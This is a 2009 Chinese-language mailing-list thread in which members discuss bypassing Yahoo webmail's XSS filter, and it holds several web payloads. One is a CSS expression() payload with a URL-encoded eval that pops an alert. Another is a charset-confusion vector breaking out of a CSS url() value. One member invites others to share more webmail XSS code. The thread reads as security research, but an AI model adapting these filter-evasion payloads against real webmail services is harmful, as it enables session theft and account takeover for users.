字符集已经过时了,去年到今年一直是语法绕过!

在 09-6-2,阿賢<[email protected]> 写道:
> 二楼的是的似乎不是用字符集bypass.而描述里说的是MBCS环境字符集bypass.而据我所知yahoo字符是utf-8,无奈ing.
> 我希望大家可以交流分享一下各webmail XSS的代码,我在此先放出一段的代码.(可惜上星期己失效)
> <style>div{font:'\'
> ';'}a';background-image:expression((window.rrr==1)?'':eval('rrr=1;eval(unescape(%27%61%6C%65%72%74%28%2F%78%73%73%2F%29%27));'));}'{}</style><div
> id="myp">hhhhh</div>
>
> 2009/6/2 vul crack <[email protected]>
>
>> yahoo xss
>> 今年的研究速度明显慢于去年,去年下半年爆了那么多,但是基本一周新的就能出来,今年到现在已经是第三个了,爆了两次,每次的研究时间变成10天左右了,不知道下半年形式会怎么样?
>>
>> 在 09-5-31,阿賢<[email protected]> 写道:
>> >   n<style>
>> > #x{
>> > background: url('http://www.google.cn{chr}');background: url('http://
>> > ;color:red;www.google.cn');
>> > }
>> > </style>
>> > <div id="x">codz</div>
>> > 描述:
>> >   nYahoo修复过在html属性里出现的字符集问题
>> > n字符集问题不只出现在html属性,同样存在于css,js等地方
>> > nYahoo的Filter基于语法分析,语法分析的时候为非MBCS字符集
>> > nFilter没有处理好在css里的非法字符,导致MBCS环境下的xss
>> >
>> > 问:窃以为Exploit里chr便是代码写入触发CSS的地方.却一直没有明白这样的语句究竟如何能触发CSS.更不明白后面;background:
>> > url('http://;color:red;www.google.cn'); .恳请大家给与指导.
>> >
>> > >
>> >
>>
>> >
>>
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [email protected]
-~----------~----~----~----~------~----~------~--~---

回复